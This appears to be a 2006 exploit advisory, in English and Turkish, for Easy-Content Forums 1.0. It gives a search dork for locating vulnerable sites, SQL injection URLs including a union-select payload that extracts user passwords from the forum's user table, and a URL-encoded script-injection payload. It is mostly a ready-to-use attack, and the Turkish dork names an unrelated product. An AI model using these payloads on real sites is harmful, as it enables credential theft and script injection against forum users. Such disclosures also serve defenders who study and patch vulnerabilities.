Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:12852
HistoryMay 27, 2006 - 12:00 a.m.

Easy-Content Forums 1.0 Multiple [SQL/XSS] Vulnerabilities

2006-05-2700:00:00
vulners.com
24

ENGLISH

Title : Easy-Content Forums 1.0 Multiple SQL/XSS Vulnerabilities

Dork : "Copyright 2004 easy-content forums"

Author : ajann

Exploit;

SQL INJECTİON--------------------------------------------------------

http://[target]/[path]/userview.asp?startletter=SQL TEXT

http://[target]/[path]/topics.asp?catid=1'SQL TEXT =>catid=x

Example:

http://[target]/[path]/topics.asp?catid=1 union+select+0,password,0,0,0,0,0,0,0,0+from+tbl_forum_users

XSS--------------------------------------------------------

http://[target]/[path]/userview.asp?startletter=xss TEXT

http://[target]/[path]/topics.asp?catid=30&forumname=XSS TEXT

Example:

http://[target]/[path]/topics.asp?catid=30&forumname=%22%3E%3Cscript%3Ealert%28%27X%27%29%3B%3C%2Fscript%3E

%22%3E%3Cscript%3Ealert%28%27X%27%29%3B%3C%2Fscript%3E == X

ajann,Turkey

TURKISH

Başlık : Easy-Content Forums 1.0 Multiple SQL/XSS Vulnerabilities

Sözcük[Arama] : "powered by phpmydirectory"

Açığı Bulan : ajann

Açık bulunan dosyalar;

SQL INJECTİON--------------------------------------------------------

http://[target]/[path]/userview.asp?startletter=SQL SORGUNUZ

http://[target]/[path]/topics.asp?catid=1'SQL SORGUNUZ =>catid=Değişken

Örnek:

http://[target]/[path]/topics.asp?catid=1 union+select+0,password,0,0,0,0,0,0,0,0+from+tbl_forum_users

XSS--------------------------------------------------------

http://[target]/[path]/userview.asp?startletter=XSS KODLARINIZ

http://[target]/[path]/topics.asp?catid=30&forumname=XSS KODLARINIZ

Örnek:

http://[target]/[path]/topics.asp?catid=30&forumname=%22%3E%3Cscript%3Ealert%28%27X%27%29%3B%3C%2Fscript%3E

%22%3E%3Cscript%3Ealert%28%27X%27%29%3B%3C%2Fscript%3E Ekrana X uyarısı
çıkarıcaktır.

Açıklama:
userview.asp , topics.asp dosyalarında bulunan filtreleme eksikliği nedeniyle sql sorgu
çalıştırılabilmektedir.
userview.asp , topics.asp dosyalarında bulunan filtreleme eksikliği nedeniyle xss kodları
çalışabilmektedir.

ajann,Turkiye